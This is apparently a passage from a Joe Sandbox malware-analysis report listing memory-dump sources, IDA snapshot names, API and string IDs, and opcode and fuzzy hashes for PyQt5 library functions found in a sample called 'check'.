                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?removeItem@QueryQuery@@String@@@
                                                                                                                                                                                                                • String ID: BJ1$QUrlQuery$removeQueryItem$removeQueryItem(self, key: Optional[str])
                                                                                                                                                                                                                • API String ID: 93498939-2400469787
                                                                                                                                                                                                                • Opcode ID: 8d8666436a678cf75e63ed204d7564cced6f099280b44b197963fa9e19b43ebe
                                                                                                                                                                                                                • Instruction ID: 77c20c58503981403286938bcb4b7a9d51eea943163ede1147d540047a6674de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d8666436a678cf75e63ed204d7564cced6f099280b44b197963fa9e19b43ebe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 092124B6B19F46C5DB50DF25E888AA933B4FB48B80F954036CA9D53720EF7AD598C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setKey@Memory@@SharedString@@@
                                                                                                                                                                                                                • String ID: BJ1$QSharedMemory$setKey$setKey(self, key: Optional[str])
                                                                                                                                                                                                                • API String ID: 2879159909-1527601641
                                                                                                                                                                                                                • Opcode ID: 215513b3601d079f553af05ed6af6ede933a721695f8e4ad065bb73493a99b63
                                                                                                                                                                                                                • Instruction ID: a4eca9cac70a611d9a5c89c9d5490e12f590ca704edec69274f0f5cd6ec998b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 215513b3601d079f553af05ed6af6ede933a721695f8e4ad065bb73493a99b63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 072115B6B19F46C5DB50DF25E888AA933B4FB48B90F954032CA9D53720EF7AD598C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?methodCount@QMetaObject@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E96A
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?method@QMetaObject@@QEBA?AVQMetaMethod@@H@Z.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E98A
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?methodType@QMetaMethod@@QEBA?AW4MethodType@1@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E99B
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?methodSignature@QMetaMethod@@QEBA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E9AE
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?indexOf@QByteArray@@QEBAHDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E9BD
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?truncate@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E9CD
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ?qstrcmp@@YAHAEBVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E9DF
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305E9FC
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305E930: PyErr_Format.PYTHON3(?,?,?,?,?,?,?,00007FFB02FAE33F), ref: 00007FFB0305EA33
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON3 ref: 00007FFB02FAE34D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@ByteMeta$?methodMethod@@$Object@@$?index?method@?qstrcmp@@?truncate@Count@DeallocErr_FormatMethodSignature@Type@Type@1@
                                                                                                                                                                                                                • String ID: BA8$QObject$__getattr__$__getattr__(self, name: Optional[str]) -> Any
                                                                                                                                                                                                                • API String ID: 650078727-794809493
                                                                                                                                                                                                                • Opcode ID: e93c37ff0c271bc22e79d89578b67e4f4b1c153928548e4096b89b9826d096fe
                                                                                                                                                                                                                • Instruction ID: 6b7d5eeceaae80ef16663bc59a77195fdcea9c2abf0a546671883181ce210710
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e93c37ff0c271bc22e79d89578b67e4f4b1c153928548e4096b89b9826d096fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33110AB6A19F46C1DB40DF25E888AAD33A4FB48B90F994032DA9D13720DF7DD549C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?marginsRemoved@QRect@@QEBA?AV1@AEBVQMargins@@@Z.QT5CORE ref: 00007FFB02F244F0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?marginsMargins@@@Rect@@Removed@malloc
                                                                                                                                                                                                                • String ID: BJ9$QRect$marginsRemoved$marginsRemoved(self, margins: QMargins) -> QRect
                                                                                                                                                                                                                • API String ID: 2831996462-2367980682
                                                                                                                                                                                                                • Opcode ID: 7817b58dd3fe7f73c81d18316dde234c366bf5c5180105f64556819b03e34e57
                                                                                                                                                                                                                • Instruction ID: 195b4320b5da5b7907ed8da7162ac9f4b9555006e97f1a08761f50a60f7ab940
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7817b58dd3fe7f73c81d18316dde234c366bf5c5180105f64556819b03e34e57
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1146B6A19F4681EB40DF25E888BA933A4FB48F80F9A0036CA4D13320EF7DD449C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?changePersistentIndex@QAbstractItemModel@@IEAAXAEBVQModelIndex@@0@Z.QT5CORE ref: 00007FFB02F78347
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?changeAbstractIndex@Index@@0@ItemModelModel@@Persistent
                                                                                                                                                                                                                • String ID: BJ9J9$QStringListModel$changePersistentIndex$changePersistentIndex(self, from_: QModelIndex, to: QModelIndex)
                                                                                                                                                                                                                • API String ID: 794346470-1345576863
                                                                                                                                                                                                                • Opcode ID: 2e03df9631c20c06d3a1ee7a292e5f2d0bec94dc26d28bfbd2c888edcbfc8995
                                                                                                                                                                                                                • Instruction ID: f5da0cd1424418e6f65a122788cfa216e79b771a97f5fec21cef8208554abbbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e03df9631c20c06d3a1ee7a292e5f2d0bec94dc26d28bfbd2c888edcbfc8995
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D11E4B6A09F46C0DB40DF25E888BA933A4FB48B90F954136CA9C53320EF79D559C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?remove@Array@@Byte
                                                                                                                                                                                                                • String ID: Bii$QByteArray$remove$remove(self, index: int, len: int) -> QByteArray
                                                                                                                                                                                                                • API String ID: 3851078773-292571182
                                                                                                                                                                                                                • Opcode ID: 72912945854d0ccaea1e3503d3a47876f6785f4ba5315ecb857945122a8a0d34
                                                                                                                                                                                                                • Instruction ID: 3c5fa563081d4e9cb90651bae0138af3c210801da2c6edf4f13dae827b00534e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72912945854d0ccaea1e3503d3a47876f6785f4ba5315ecb857945122a8a0d34
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7112BB6B19E46D5DB40DF25E888BA933B4FB48B84FA65032CA5D13720DF3AD949C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?commonPrefix@QVersionNumber@@SA?AV1@AEBV1@0@Z.QT5CORE ref: 00007FFB02F6A2FD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?commonNumber@@Prefix@V1@0@Versionmalloc
                                                                                                                                                                                                                • String ID: J9J9$QVersionNumber$commonPrefix$commonPrefix(v1: QVersionNumber, v2: QVersionNumber) -> QVersionNumber
                                                                                                                                                                                                                • API String ID: 601173167-262785773
                                                                                                                                                                                                                • Opcode ID: d18692266713561cdac0d9e65328cef8d32c3d25ea08c56afa404f45f414b450
                                                                                                                                                                                                                • Instruction ID: 2382af6e587168fd9d9ad3dfcb289720d9410534fcca956d3889ad0681de1b65
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d18692266713561cdac0d9e65328cef8d32c3d25ea08c56afa404f45f414b450
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24113CB5A19E4681EB409B75E85CBAD33A5FB88B84F991032CA4D13320EE3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?error@Bool_Error@1@FromLongReader@@Stream
                                                                                                                                                                                                                • String ID: QXmlStreamReader$hasError$hasError(self) -> bool
                                                                                                                                                                                                                • API String ID: 4038353787-3941641389
                                                                                                                                                                                                                • Opcode ID: 41debfeb6165051a339091b33c706f4ce006d729ab49c2ad695b4f07441a01b4
                                                                                                                                                                                                                • Instruction ID: aeb855e568c5d9e9b4510ff6f582acfa5dbf89074f68e4b9555717f7ccddf970
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41debfeb6165051a339091b33c706f4ce006d729ab49c2ad695b4f07441a01b4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5015EB6B19B4691EB00DF75E88C9A933A8FF48B44B994032CA5D57330EFB8D599C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
